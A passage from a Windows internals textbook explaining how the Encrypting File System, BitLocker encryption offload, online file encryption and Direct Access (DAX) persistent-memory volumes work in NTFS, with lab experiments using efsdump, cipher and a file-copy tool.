protection from specific—and nonoverlapping—threats. Together, BitLocker
and EFS provide a “defense in depth” for the data on your system.
The paradigm used by EFS is to encrypt files and directories using
symmetric encryption (a single key that is used for encrypting and decrypting
the file). The symmetric encryption key is then encrypted using asymmetric
encryption (one key for encryption—often referred to as the public key—and
a different key for decryption—often referred to as the private key) for each
user who is granted access to the file. The details and theory behind these
encryption methods is beyond the scope of this book; however, a good
primer is available at https://docs.microsoft.com/en-
us/windows/desktop/SecCrypto/cryptography-essentials.
EFS works with the Windows Cryptography Next Generation (CNG)
APIs, and thus may be configured to use any algorithm supported by (or
added to) CNG. By default, EFS will use the Advanced Encryption Standard
(AES) for symmetric encryption (256-bit key) and the Rivest-Shamir-
Adleman (RSA) public key algorithm for asymmetric encryption (2,048-bit
keys).
Users can encrypt files via Windows Explorer by opening a file’s
Properties dialog box, clicking Advanced, and then selecting the Encrypt
Contents To Secure Data option, as shown in Figure 11-68. (A file may be
encrypted or compressed, but not both.) Users can also encrypt files via a
command-line utility named Cipher (%SystemRoot%\System32\Cipher.exe)
or programmatically using Windows APIs such as EncryptFile and
AddUsersToEncryptedFile.
Figure 11-68 Encrypt files by using the Advanced Attributes dialog box.
Windows automatically encrypts files that reside in directories that are
designated as encrypted directories. When a file is encrypted, EFS generates
a random number for the file that EFS calls the file’s File Encryption Key
(FEK). EFS uses the FEK to encrypt the file’s contents using symmetric
encryption. EFS then encrypts the FEK using the user’s asymmetric public
key and stores the encrypted FEK in the $EFS alternate data stream for the
file. The source of the public key may be administratively specified to come
from an assigned X.509 certificate or a smartcard or can be randomly
generated (which would then be added to the user’s certificate store, which
can be viewed using the Certificate Manager
(%SystemRoot%\System32\Certmgr.msc). After EFS completes these steps,
the file is secure; other users can’t decrypt the data without the file’s
decrypted FEK, and they can’t decrypt the FEK without the user private key.
Symmetric encryption algorithms are typically very fast, which makes
them suitable for encrypting large amounts of data, such as file data.
However, symmetric encryption algorithms have a weakness: You can
bypass their security if you obtain the key. If multiple users want to share one
encrypted file protected only using symmetric encryption, each user would
require access to the file’s FEK. Leaving the FEK unencrypted would
obviously be a security problem, but encrypting the FEK once would require
all the users to share the same FEK decryption key—another potential
security problem.
Keeping the FEK secure is a difficult problem, which EFS addresses with
the public key–based half of its encryption architecture. Encrypting a file’s
FEK for individual users who access the file lets multiple users share an
encrypted file. EFS can encrypt a file’s FEK with each user’s public key and
can store each user’s encrypted FEK in the file’s $EFS data stream. Anyone
can access a user’s public key, but no one can use a public key to decrypt the
data that the public key encrypted. The only way users can decrypt a file is
with their private key, which the operating system must access. A user’s
private key decrypts the user’s encrypted copy of a file’s FEK. Public key–
based algorithms are usually slow, but EFS uses these algorithms only to
encrypt FEKs. Splitting key management between a publicly available key
and a private key makes key management a little easier than symmetric
encryption algorithms do and solves the dilemma of keeping the FEK secure.
Several components work together to make EFS work, as the diagram of
EFS architecture in Figure 11-69 shows. EFS support is merged into the
NTFS driver. Whenever NTFS encounters an encrypted file, NTFS executes
EFS functions that it contains. The EFS functions encrypt and decrypt file
data as applications access encrypted files. Although EFS stores an FEK with
a file’s data, users’ public keys encrypt the FEK. To encrypt or decrypt file
data, EFS must decrypt the file’s FEK with the aid of CNG key management
services that reside in user mode.
Figure 11-69 EFS architecture.
The Local Security Authority Subsystem (LSASS,
%SystemRoot%\System32\Lsass.exe) manages logon sessions but also hosts
the EFS service (Efssvc.dll). For example, when EFS needs to decrypt a FEK
to decrypt file data a user wants to access, NTFS sends a request to the EFS
service inside LSASS.
Encrypting a file for the first time
The NTFS driver calls its EFS helper functions when it encounters an
encrypted file. A file’s attributes record that the file is encrypted in the same
way that a file records that it’s compressed (discussed earlier in this chapter).
NTFS has specific interfaces for converting a file from nonencrypted to
encrypted form, but user-mode components primarily drive the process. As
described earlier, Windows lets you encrypt a file in two ways: by using the
cipher command-line utility or by checking the Encrypt Contents To
Secure Data check box in the Advanced Attributes dialog box for a file in
Windows Explorer. Both Windows Explorer and the cipher command rely
on the EncryptFile Windows API.
EFS stores only one block of information in an encrypted file, and that
block contains an entry for each user sharing the file. These entries are called
key entries, and EFS stores them in the data decryption field (DDF) portion
of the file’s EFS data. A collection of multiple key entries is called a key ring
because, as mentioned earlier, EFS lets multiple users share encrypted files.
Figure 11-70 shows a file’s EFS information format and key entry format.
EFS stores enough information in the first part of a key entry to precisely
describe a user’s public key. This data includes the user’s security ID (SID)
(note that the SID is not guaranteed to be present), the container name in
which the key is stored, the cryptographic provider name, and the
asymmetric key pair certificate hash. Only the asymmetric key pair
certificate hash is used by the decryption process. The second part of the key
entry contains an encrypted version of the FEK. EFS uses the CNG to
encrypt the FEK with the selected asymmetric encryption algorithm and the
user’s public key.
Figure 11-70 Format of EFS information and key entries.
EFS stores information about recovery key entries in a file’s data recovery
field (DRF). The format of DRF entries is identical to the format of DDF
entries. The DRF’s purpose is to let designated accounts, or recovery agents,
decrypt a user’s file when administrative authority must have access to the
user’s data. For example, suppose a company employee forgot his or her
logon password. An administrator can reset the user’s password, but without
recovery agents, no one can recover the user’s encrypted data.
Recovery agents are defined with the Encrypted Data Recovery Agents
security policy of the local computer or domain. This policy is available from
the Local Security Policy MMC snap-in, as shown in Figure 11-71. When
you use the Add Recovery Agent Wizard (by right-clicking Encrypting File
System and then clicking Add Data Recovery Agent), you can add recovery
agents and specify which private/public key pairs (designated by their
certificates) the recovery agents use for EFS recovery. Lsasrv (Local Security
Authority service, which is covered in Chapter 7 of Part 1) interprets the
recovery policy when it initializes and when it receives notification that the
recovery policy has changed. EFS creates a DRF key entry for each recovery
agent by using the cryptographic provider registered for EFS recovery.
Figure 11-71 Encrypted Data Recovery Agents group policy.
A user can create their own Data Recovery Agent (DRA) certificate by
using the cipher /r command. The generated private certificate file can be
imported by the Recovery Agent Wizard and by the Certificates snap-in of
the domain controller or the machine on which the administrator should be
able to decrypt encrypted files.
As the final step in creating EFS information for a file, Lsasrv calculates a
checksum for the DDF and DRF by using the MD5 hash facility of Base
Cryptographic Provider 1.0. Lsasrv stores the checksum’s result in the EFS
information header. EFS references this checksum during decryption to
ensure that the contents of a file’s EFS information haven’t become
corrupted or been tampered with.
Encrypting file data
When a user encrypts an existing file, the following process occurs:
1.
The EFS service opens the file for exclusive access.
2.
All data streams in the file are copied to a plaintext temporary file in
the system’s temporary directory.
3.
A FEK is randomly generated and used to encrypt the file by using
AES-256.
4.
A DDF is created to contain the FEK encrypted by using the user’s
public key. EFS automatically obtains the user’s public key from the
user’s X.509 version 3 file encryption certificate.
5.
If a recovery agent has been designated through Group Policy, a DRF
is created to contain the FEK encrypted by using RSA and the
recovery agent’s public key.
6.
EFS automatically obtains the recovery agent’s public key for file
recovery from the recovery agent’s X.509 version 3 certificate, which
is stored in the EFS recovery policy. If there are multiple recovery
agents, a copy of the FEK is encrypted by using each agent’s public
key, and a DRF is created to store each encrypted FEK.
Note
The file recovery property in the certificate is an example of an
enhanced key usage (EKU) field. An EKU extension and
extended property specify and limit the valid uses of a
certificate. File Recovery is one of the EKU fields defined by
Microsoft as part of the Microsoft public key infrastructure
(PKI).
7.
EFS writes the encrypted data, along with the DDF and the DRF,
back to the file. Because symmetric encryption does not add
additional data, file size increase is minimal after encryption. The
metadata, consisting primarily of encrypted FEKs, is usually less than
1 KB. File size in bytes before and after encryption is normally
reported to be the same.
8.
The plaintext temporary file is deleted.
When a user saves a file to a folder that has been configured for
encryption, the process is similar except that no temporary file is created.
The decryption process
When an application accesses an encrypted file, decryption proceeds as
follows:
1.
NTFS recognizes that the file is encrypted and sends a request to the
EFS driver.
2.
The EFS driver retrieves the DDF and passes it to the EFS service.
3.
The EFS service retrieves the user’s private key from the user’s
profile and uses it to decrypt the DDF and obtain the FEK.
4.
The EFS service passes the FEK back to the EFS driver.
5.
The EFS driver uses the FEK to decrypt sections of the file as needed
for the application.
Note
When an application opens a file, only those sections of the file
that the application is using are decrypted because EFS uses
cipher block chaining. The behavior is different if the user
removes the encryption attribute from the file. In this case, the
entire file is decrypted and rewritten as plaintext.
6.
The EFS driver returns the decrypted data to NTFS, which then sends
the data to the requesting application.
Backing up encrypted files
An important aspect of any file encryption facility’s design is that file data is
never available in unencrypted form except to applications that access the file
via the encryption facility. This restriction particularly affects backup
utilities, in which archival media store files. EFS addresses this problem by
providing a facility for backup utilities so that the utilities can back up and
restore files in their encrypted states. Thus, backup utilities don’t have to be
able to decrypt file data, nor do they need to encrypt file data in their backup
procedures.
Backup utilities use the EFS API functions OpenEncryptedFileRaw,
ReadEncryptedFileRaw, WriteEncryptedFileRaw, and
CloseEncryptedFileRaw in Windows to access a file’s encrypted contents.
After a backup utility opens a file for raw access during a backup operation,
the utility calls ReadEncryptedFileRaw to obtain the file data. All the EFS
backup utilities APIs work by issuing FSCTL to the NTFS file system. For
example, the ReadEncryptedFileRaw API first reads the $EFS stream by
issuing a FSCTL_ENCRYPTION_FSCTL_IO control code to the NTFS
driver and then reads all of the file’s streams (including the $DATA stream
and optional alternate data streams); in case the stream is encrypted, the
ReadEncryptedFileRaw API uses the FSCTL_READ_RAW_ENCRYPTED
control code to request the encrypted stream data to the file system driver.
EXPERIMENT: Viewing EFS information
EFS has a handful of other API functions that applications can use
to manipulate encrypted files. For example, applications use the
AddUsersToEncryptedFile API function to give additional users
access to an encrypted file and RemoveUsersFromEncryptedFile to
revoke users’ access to an encrypted file. Applications use the
QueryUsersOnEncryptedFile function to obtain information about
a file’s associated DDF and DRF key fields.
QueryUsersOnEncryptedFile returns the SID, certificate hash
value, and display information that each DDF and DRF key field
contains. The following output is from the EFSDump utility, from
Sysinternals, when an encrypted file is specified as a command-line
argument:
Click here to view code image
C:\Andrea>efsdump Test.txt
EFS Information Dumper v1.02
Copyright (C) 1999 Mark Russinovich
Systems Internals - http://www.sysinternals.com
C:\Andrea\Test.txt:
DDF Entries:
WIN-46E4EFTBP6Q\Andrea:
Andrea(Andrea@WIN-46E4EFTBP6Q)
Unknown user:
Tony(Tony@WIN-46E4EFTBP6Q)
DRF Entry:
Unknown user:
EFS Data Recovery
You can see that the file Test.txt has two DDF entries for the
users Andrea and Tony and one DRF entry for the EFS Data
Recovery agent, which is the only recovery agent currently
registered on the system. You can use the cipher tool to add or
remove users in the DDF entries of a file. For example, the
command
Click here to view code image
cipher /adduser /user:Tony Test.txt
enables the user Tony to access the encrypted file Test.txt (adding
an entry in the DDF of the file).
Copying encrypted files
When an encrypted file is copied, the system doesn’t decrypt the file and re-
encrypt it at its destination; it just copies the encrypted data and the EFS
alternate data stream to the specified destination. However, if the destination
does not support alternate data streams—if it is not an NTFS volume (such as
a FAT volume) or is a network share (even if the network share is an NTFS
volume)—the copy cannot proceed normally because the alternate data
streams would be lost. If the copy is done with Explorer, a dialog box
informs the user that the destination volume does not support encryption and
asks the user whether the file should be copied to the destination
unencrypted. If the user agrees, the file will be decrypted and copied to the
specified destination. If the copy is done from a command prompt, the copy
command will fail and return the error message “The specified file could not
be encrypted.”
BitLocker encryption offload
The NTFS file system driver uses services provided by the Encrypting File
System (EFS) to perform file encryption and decryption. These kernel-mode
services, which communicate with the user-mode encrypting file service
(Efssvc.dll), are provided to NTFS through callbacks. When a user or
application encrypts a file for the first time, the EFS service sends a
FSCTL_SET_ENCRYPTION control code to the NTFS driver. The NTFS file
system driver uses the “write” EFS callback to perform in-memory
encryption of the data located in the original file. The actual encryption
process is performed by splitting the file content, which is usually processed
in 2-MB blocks, in small 512-byte chunks. The EFS library uses the
BCryptEncrypt API to actually encrypt the chunk. As previously mentioned,
the encryption engine is provided by the Kernel CNG driver (Cng.sys), which
supports the AES or 3DES algorithms used by EFS (along with many more).
As EFS encrypts each 512-byte chunk (which is the smallest physical size of
standard hard disk sectors), at every round it updates the IV (initialization
vector, also known as salt value, which is a 128-bit number used to provide
randomization to the encryption scheme), using the byte offset of the current
block.
In Windows 10, encryption performance has increased thanks to BitLocker
encryption offload. When BitLocker is enabled, the storage stack already
includes a device created by the Full Volume Encryption Driver (Fvevol.sys),
which, if the volume is encrypted, performs real-time encryption/decryption
on physical disk sectors; otherwise, it simply passes through the I/O requests.
The NTFS driver can defer the encryption of a file by using IRP
Extensions. IRP Extensions are provided by the I/O manager (more details
about the I/O manager are available in Chapter 6 of Part 1) and are a way to
store different types of additional information in an IRP. At file creation
time, the EFS driver probes the device stack to check whether the BitLocker
control device object (CDO) is present (by using the
IOCTL_FVE_GET_CDOPATH control code), and, if so, it sets a flag in the
SCB, indicating that the stream can support encryption offload.
Every time an encrypted file is read or written, or when a file is encrypted
for the first time, the NTFS driver, based on the previously set flag,
determines whether it needs to encrypt/decrypt each file block. In case
encryption offload is enabled, NTFS skips the call to EFS; instead, it adds an
IRP extension to the IRP that will be sent to the related volume device for
performing the physical I/O. In the IRP extension, the NTFS file system
driver stores the starting virtual byte offset of the block of the file that the
storage driver is going to read or write, its size, and some flags. The NTFS
driver finally emits the I/O to the related volume device by using the
IoCallDriver API.
The volume manager will parse the IRP and send it to the correct storage
driver. The BitLocker driver recognizes the IRP extension and encrypts the
data that NTFS has sent down to the device stack, using its own routines,
which operate on physical sectors. (Bitlocker, as a volume filter driver,
doesn’t implement the concept of files and directories.) Some storage drivers,
such as the Logical Disk Manager driver (VolmgrX.sys, which provides
dynamic disk support) are filter drivers that attach to the volume device
objects. These drivers reside below the volume manager but above the
BitLocker driver, and they can provide data redundancy, striping, or storage
virtualization, characteristics which are usually implemented by splitting the
original IRP into multiple secondary IRPs that will be emitted to different
physical disk devices. In this case, the secondary I/Os, when intercepted by
the BitLocker driver, will result in data encrypted by using a different salt
value that would corrupt the file data.
IRP extensions support the concept of IRP propagation, which
automatically modifies the file virtual byte offset stored in the IRP extension
every time the original IRP is split. Normally, the EFS driver encrypts file
blocks on 512-byte boundaries, and the IRP can’t be split on an alignment
less than a sector size. As a result, BitLocker can correctly encrypt and
decrypt the data, ensuring that no corruption will happen.
Many of BitLocker driver’s routines can’t tolerate memory failures.
However, since IRP extension is dynamically allocated from the nonpaged
pool when the IRP is split, the allocation can fail. The I/O manager resolves
this problem with the IoAllocateIrpEx routine. This routine can be used by
kernel drivers for allocating IRPs (like the legacy IoAllocateIrp). But the new
routine allocates an extra stack location and stores any IRP extensions in it.
Drivers that request an IRP extension on IRPs allocated by the new API no
longer need to allocate new memory from the nonpaged pool.
Note
A storage driver can decide to split an IRP for different reasons—whether
or not it needs to send multiple I/Os to multiple physical devices. The
Volume Shadow Copy Driver (Volsnap.sys), for example, splits the I/O
while it needs to read a file from a copy-on-write volume shadow copy, if
the file resides in different sections: on the live volume and on the
Shadow Copy’s differential file (which resides in the System Volume
Information hidden directory).
Online encryption support
When a file stream is encrypted or decrypted, it is exclusively locked by the
NTFS file system driver. This means that no applications can access the file
during the entire encryption or decryption process. For large files, this
limitation can break the file’s availability for many seconds—or even
minutes. Clearly this is not acceptable for large file-server environments.
To resolve this, recent versions of Windows 10 introduced online
encryption support. Through the right synchronization, the NTFS driver is
able to perform file encryption and decryption without retaining exclusive
file access. EFS enables online encryption only if the target encryption
stream is a data stream (named or unnamed) and is nonresident. (Otherwise, a
standard encryption process starts.) If both conditions are satisfied, the EFS
service sends a FSCTL_SET_ENCRYPTION control code to the NTFS driver
to set a flag that enables online encryption.
Online encryption is possible thanks to the "$EfsBackup" attribute (of type
$LOGGED_UTILITY_STREAM) and to the introduction of range locks, a
new feature that allows the file system driver to lock (in an exclusive or
shared mode) only only a portion of a file. When online encryption is
enabled, the NtfsEncryptDecryptOnline internal function starts the encryption
and decryption process by creating the $EfsBackup attribute (and its SCB)
and by acquiring a shared lock on the first 2-MB range of the file. A shared
lock means that multiple readers can still read from the file range, but other
writers need to wait until the end of the encryption or decryption operation
before they can write new data.
The NTFS driver allocates a 2-MB buffer from the nonpaged pool and
reserves some clusters from the volume, which are needed to represent 2 MB
of free space. (The total number of clusters depends on the volume cluster’s
size.) The online encryption function reads the original data from the
physical disk and stores it in the allocated buffer. If BitLocker encryption
offload is not enabled (described in the previous section), the buffer is
encrypted using EFS services; otherwise, the BitLocker driver encrypts the
data when the buffer is written to the previously reserved clusters.
At this stage, NTFS locks the entire file for a brief amount of time: only
the time needed to remove the clusters containing the unencrypted data from
the original stream’s extent table, assign them to the $EfsBackup non-
resident attribute, and replace the removed range of the original stream’s
extent table with the new clusters that contain the newly encrypted data.
Before releasing the exclusive lock, the NTFS driver calculates a new high
watermark value and stores it both in the original file in-memory SCB and in
the EFS payload of the $EFS alternate data stream. NTFS then releases the
exclusive lock. The clusters that contain the original data are first zeroed out;
then, if there are no more blocks to process, they are eventually freed.
Otherwise, the online encryption cycle restarts with the next 2-MB chunk.
The high watermark value stores the file offset that represents the
boundary between encrypted and nonencrypted data. Any concurrent write
beyond the watermark can occur in its original form; other concurrent writes
before the watermark need to be encrypted before they can succeed. Writes
to the current locked range are not allowed. Figure 11-72 shows an example
of an ongoing online encryption for a 16-MB file. The first two blocks (2 MB
in size) already have been encrypted; the high watermark value is set to 4
MB, dividing the file between its encrypted and non-encrypted data. A range
lock is set on the 2-MB block that follows the high watermark. Applications
can still read from that block, but they can’t write any new data (in the latter
case, they need to wait). The block’s data is encrypted and stored in reserved
clusters. When exclusive file ownership is taken, the original block’s clusters
are remapped to the $EfsBackup stream (by removing or splitting their entry
in the original file’s extent table and inserting a new entry in the $EfsBackup
attribute), and the new clusters are inserted in place of the previous ones. The
high watermark value is increased, the file lock is released, and the online
encryption process proceeds to the next stage starting at the 6-MB offset; the
previous clusters located in the $EfsBackup stream are concurrently zeroed-
out and can be reused for new stages.
Figure 11-72 Example of an ongoing online encryption for a 16MB file.
The new implementation allows NTFS to encrypt or decrypt in place,
getting rid of temporary files (see the previous “Encrypting file data” section
for more details). More importantly, it allows NTFS to perform file
encryption and decryption while other applications can still use and modify
the target file stream (the time spent with the exclusive lock hold is small and
not perceptible by the application that is attempting to use the file).
Direct Access (DAX) disks
Persistent memory is an evolution of solid-state disk technology: a new kind
of nonvolatile storage medium that has RAM-like performance characteristics
(low latency and high bandwidth), resides on the memory bus (DDR), and
can be used like a standard disk device.
Direct Access Disks (DAX) is the term used by the Windows operating
system to refer to such persistent memory technology (another common term
used is storage class memory, abbreviated as SCM). A nonvolatile dual in-
line memory module (NVDIMM), shown in Figure 11-73, is an example of
this new type of storage. NVDIMM is a type of memory that retains its
contents even when electrical power is removed. “Dual in-line” identifies the
memory as using DIMM packaging. At the time of writing, there are three
different types of NVDIMMs: NVIDIMM-F contains only flash storage;
NVDIMM-N, the most common, is produced by combining flash storage and
traditional DRAM chips on the same module; and NVDIMM-P has persistent
DRAM chips, which do not lose data in event of power failure.
Figure 11-73 An NVDIMM, which has DRAM and Flash chips. An
attached battery or on-board supercapacitors are needed for maintaining
the data in the DRAM chips.
One of the main characteristics of DAX, which is key to its fast
performance, is the support of zero-copy access to persistent memory. This
means that many components, like the file system driver and memory
manager, need to be updated to support DAX, which is a disruptive
technology.
Windows Server 2016 was the first Windows operating system to supports
DAX: the new storage model provides compatibility with most existing
applications, which can run on DAX disks without any modification. For
fastest performance, files and directories on a DAX volume need to be
mapped in memory using memory-mapped APIs, and the volume needs to be
formatted in a special DAX mode. At the time of this writing, only NTFS
supports DAX volumes.
The following sections describe the way in which direct access disks
operate and detail the architecture of the new driver model and the
modification on the main components responsible for DAX volume support:
the NTFS driver, memory manager, cache manager, and I/O manager.
Additionally, inbox and third-party file system filter drivers (including mini
filters) must also be individually updated to take full advantage of DAX.
DAX driver model
To support DAX volumes, Windows needed to introduce a brand-new
storage driver model. The SCM Bus Driver (Scmbus.sys) is a new bus driver
that enumerates physical and logical persistent memory (PM) devices on the
system, which are attached to its memory bus (the enumeration is performed
thanks to the NFIT ACPI table). The bus driver, which is not considered part
of the I/O path, is a primary bus driver managed by the ACPI enumerator,
which is provided by the HAL (hardware abstraction layer) through the
hardware database registry key
(HKLM\SYSTEM\CurrentControlSet\Enum\ACPI). More details about Plug
& Play Device enumeration are available in Chapter 6 of Part 1.
Figure 11-74 shows the architecture of the SCM storage driver model. The
SCM bus driver creates two different types of device objects:
■ Physical device objects (PDOs) represent physical PM devices. A
NVDIMM device is usually composed of one or multiple interleaved
NVDIMM-N modules. In the former case, the SCM bus driver creates
only one physical device object representing the NVDIMM unit. In
the latter case, it creates two distinct devices that represent each
NVDIMM-N module. All the physical devices are managed by the
miniport driver, Nvdimm.sys, which controls a physical NVDIMM
and is responsible for monitoring its health.
■ Functional device objects (FDOs) represent single DAX disks, which
are managed by the persistent memory driver, Pmem.sys. The driver
controls any byte-addressable interleave sets and is responsible for all
I/O directed to a DAX volume. The persistent memory driver is the
class driver for each DAX disk. (It replaces Disk.sys in the classical
storage stack.)
Both the SCM bus driver and the NVDIMM miniport driver expose some
interfaces for communication with the PM class driver. Those interfaces are
exposed through an IRP_MJ_PNP major function by using the
IRP_MN_QUERY_INTERFACE request. When the request is received, the
SCM bus driver knows that it should expose its communication interface
because callers specify the {8de064ff-b630-42e4-ea88-6f24c8641175}
interface GUID. Similarly, the persistent memory driver requires
communication interface to the NVDIMM devices through the {0079c21b-
917e-405e-cea9-0732b5bbcebd} GUID.
Figure 11-74 The SCM Storage driver model.
The new storage driver model implements a clear separation of
responsibilities: The PM class driver manages logical disk functionality
(open, close, read, write, memory mapping, and so on), whereas NVDIMM
drivers manage the physical device and its health. It will be easy in the future
to add support for new types of NVDIMM by just updating the Nvdimm.sys
driver. (Pmem.sys doesn’t need to change.)
DAX volumes
The DAX storage driver model introduces a new kind of volume: the DAX
volumes. When a user first formats a partition through the Format tool, she
can specify the /DAX argument to the command line. If the underlying
medium is a DAX disk, and it’s partitioned using the GPT scheme, before
creating the basic disk data structure needed for the NTFS file system, the
tool writes the GPT_BASIC_DATA_ ATTRIBUTE_DAX flag in the target
volume GPT partition entry (which corresponds to bit number 58). A good
reference for the GUID partition table is available at
https://en.wikipedia.org/wiki/GUID_Partition_Table.
When the NTFS driver then mounts the volume, it recognizes the flag and
sends a STORAGE_QUERY_PROPERTY control code to the underlying
storage driver. The IOCTL is recognized by the SCM bus driver, which
responds to the file system driver with another flag specifying that the
underlying disk is a DAX disk. Only the SCM bus driver can set the flag.
Once the two conditions are verified, and as long as DAX support is not
disabled through the
HKLM\System\CurrentControlSet\Control\FileSystem\NtfsEnableDirectAcce
ss registry value, NTFS enables DAX volume support.
DAX volumes are different from the standard volumes mainly because
they support zero-copy access to the persistent memory. Memory-mapped
files provide applications with direct access to the underlying hardware disk
sectors (through a mapped view), meaning that no intermediary components
will intercept any I/O. This characteristic provides extreme performance (but
as mentioned earlier, can impact file system filter drivers, including
minifilters).
When an application creates a memory-mapped section backed by a file
that resides on a DAX volume, the memory manager asks the file system
whether the section should be created in DAX mode, which is true only if the
volume has been formatted in DAX mode, too. When the file is later mapped
through the MapViewOfFile API, the memory manager asks the file system
for the physical memory range of a given range of the file. The file system
driver translates the requested file range in one or more volume relative
extents (sector offset and length) and asks the PM disk class driver to
translate the volume extents into physical memory ranges. The memory
manager, after receiving the physical memory ranges, updates the target
process page tables for the section to map directly to persistent storage. This
is a truly zero-copy access to storage: an application has direct access to the
persistent memory. No paging reads or paging writes will be generated. This
is important; the cache manager is not involved in this case. We examine the
implications of this later in the chapter.
Applications can recognize DAX volumes by using the
GetVolumeInformation API. If the returned flags include
FILE_DAX_VOLUME, the volume is formatted with a DAX-compatible file
system (only NTFS at the time of this writing). In the same way, an
application can identify whether a file resides on a DAX disk by using the
GetVolumeInformationByHandle API.
Cached and noncached I/O in DAX volumes
Even though memory-mapped I/O for DAX volumes provide zero-copy
access to the underlying storage, DAX volumes still support I/O through
standard means (via classic ReadFile and WriteFile APIs). As described at
the beginning of the chapter, Windows supports two kinds of regular I/O:
cached and noncached. Both types have significant differences when issued
to DAX volumes.
Cached I/O still requires interaction from the cache manager, which, while
creating a shared cache map for the file, requires the memory manager to
create a section object that directly maps to the PM hardware. NTFS is able
to communicate to the cache manager that the target file is in DAX-mode
through the new CcInitializeCacheMapEx routine. The cache manager will
then copy data from the user buffer to persistent memory: cached I/O has
therefore one-copy access to persistent storage. Note that cached I/O is still
coherent with other memory-mapped I/O (the cache manager uses the same
section); as in the memory-mapped I/O case, there are still no paging reads or
paging writes, so the lazy writer thread and intelligent read-ahead are not
enabled.
One implication of the direct-mapping is that the cache manager directly
writes to the DAX disk as soon as the NtWriteFile function completes. This
means that cached I/O is essentially noncached. For this reason, noncached
I/O requests are directly converted by the file system to cached I/O such that
the cache manager still copies directly between the user’s buffer and
persistent memory. This kind of I/O is still coherent with cached and
memory-mapped I/O.
NTFS continues to use standard I/O while processing updates to its
metadata files. DAX mode I/O for each file is decided at stream creation time
by setting a flag in the stream control block. If a file is a system metadata
file, the attribute is never set, so the cache manager, when mapping such a
file, creates a standard non-DAX file-backed section, which will use the
standard storage stack for performing paging read or write I/Os. (Ultimately,
each I/O is processed by the Pmem driver just like for block volumes, using
the sector atomicity algorithm. See the “Block volumes” section for more
details.) This behavior is needed for maintaining compatibility with write-
ahead logging. Metadata must not be persisted to disk before the
corresponding log is flushed. So, if a metadata file were DAX mapped, that
write-ahead logging requirement would be broken.
Effects on file system functionality
The absence of regular paging I/O and the application’s ability to directly
access persistent memory eliminate traditional hook points that the file
systems and related filters use to implement various features. Multiple
functionality cannot be supported on DAX-enabled volumes, like file
encryption, compressed and sparse files, snapshots, and USN journal support.
In DAX mode, the file system no longer knows when a writable memory-
mapped file is modified. When the memory section is first created, the NTFS
file system driver updates the file’s modification and access times and marks
the file as modified in the USN change journal. At the same time, it signals a
directory change notification. DAX volumes are no longer compatible with
any kind of legacy filter drivers and have a big impact on minifilters (filter
manager clients). Components like BitLocker and the volume shadow copy
driver (Volsnap.sys) don’t work with DAX volumes and are removed from
the device stack. Because a minifilter no longer knows if a file has been
modified, an antimalware file access scanner, such as one described earlier,
can no longer know if it should scan a file for viruses. It needs to assume, on
any handle close, that modification may have occurred. In turn, this
significantly harms performance, so minifilters must manually opt-in to
support DAX volumes.
Mapping of executable images
When the Windows loader maps an executable image into memory, it uses
memory-mapping services provided by the memory manager. The loader
creates a memory-mapped image section by supplying the SEC_IMAGE flag
to the NtCreateSection API. The flag specifies to the loader to map the
section as an image, applying all the necessary fixups. In DAX mode this
mustn’t be allowed to happen; otherwise, all the relocations and fixups will
be applied to the original image file on the PM disk. To correctly deal with
this problem, the memory manager applies the following strategies while
mapping an executable image stored in a DAX mode volume:
■ If there is already a control area that represents a data section for the
binary file (meaning that an application has opened the image for
reading binary data), the memory manager creates an empty memory-
backed image section and copies the data from the existing data
section to the newly created image section; then it applies the
necessary fixups.
■ If there are no data sections for the file, the memory manager creates
a regular non-DAX image section, which creates standard invalid
prototype PTEs (see Chapter 5 of Part 1 for more details). In this case,
the memory manager uses the standard read and write routines of the
Pmem driver to bring data in memory when a page fault for an invalid
access on an address that belongs to the image-backed section
happens.
At the time of this writing, Windows 10 does not support execution in-
place, meaning that the loader is not able to directly execute an image from
DAX storage. This is not a problem, though, because DAX mode volumes
have been originally designed to store data in a very performant way.
Execution in-place for DAX volumes will be supported in future releases of
Windows.
EXPERIMENT: Witnessing DAX I/O with Process
Monitor
You can witness DAX I/Os using Process Monitor from
SysInternals and the FsTool.exe application, which is available in
this book’s downloadable resources. When an application reads or
writes from a memory-mapped file that resides on a DAX-mode
volume, the system does not generate any paging I/O, so nothing is
visible to the NTFS driver or to the minifilters that are attached
above or below it. To witness the described behavior, just open
Process Monitor, and, assuming that you have two different
volumes mounted as the P: and Q: drives, set the filters in a similar
way as illustrated in the following figure (the Q: drive is the DAX-
mode volume):
For generating I/O on DAX-mode volumes, you need to simulate
a DAX copy using the FsTool application. The following example
copies an ISO image located in the P: DAX block-mode volume
(even a standard volume created on the top of a regular disk is fine
for the experiment) to the DAX-mode “Q:” drive:
Click here to view code image
P:\>fstool.exe /daxcopy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume:
False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume:
True.
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 489.67 MB/Sec
Press any key to exit...
Process Monitor has captured a trace of the DAX copy operation
that confirms the expected results:
From the trace above, you can see that on the target file
(Q:\test.iso), only the CreateFileMapping operation was
intercepted: no WriteFile events are visible. While the copy was
proceeding, only paging I/O on the source file was detected by
Process Monitor. These paging I/Os were generated by the memory
manager, which needed to read the data back from the source
volume as the application was generating page faults while
accessing the memory-mapped file.
To see the differences between memory-mapped I/O and
standard cached I/O, you need to copy again the file using a
standard file copy operation. To see paging I/O on the source file
data, make sure to restart your system; otherwise, the original data
remains in the cache:
Click here to view code image
P:\>fstool.exe /copy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 13 Sec - Transfer Rate:
313.71 MB/s.
Press any key to exit...
If you compare the trace acquired by Process Monitor with the
previous one, you can confirm that cached I/O is a one-copy
operation. The cache manager still copies chunks of memory
between the application-provided buffer and the system cache,
which is mapped directly on the DAX disk. This is confirmed by
the fact that again, no paging I/O is highlighted on the target file.
As a last experiment, you can try to start a DAX copy between
two files that reside on the same DAX-mode volume or that reside
on two different DAX-mode volumes:
Click here to view code image
P:\>fstool /daxcopy q:\test.iso q:\test_copy_2.iso
TFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: q:\test.iso.
Target file path: q:\test_copy_2.iso.
Source Volume: q:\ - File system: NTFS - Is DAX Volume:
True.
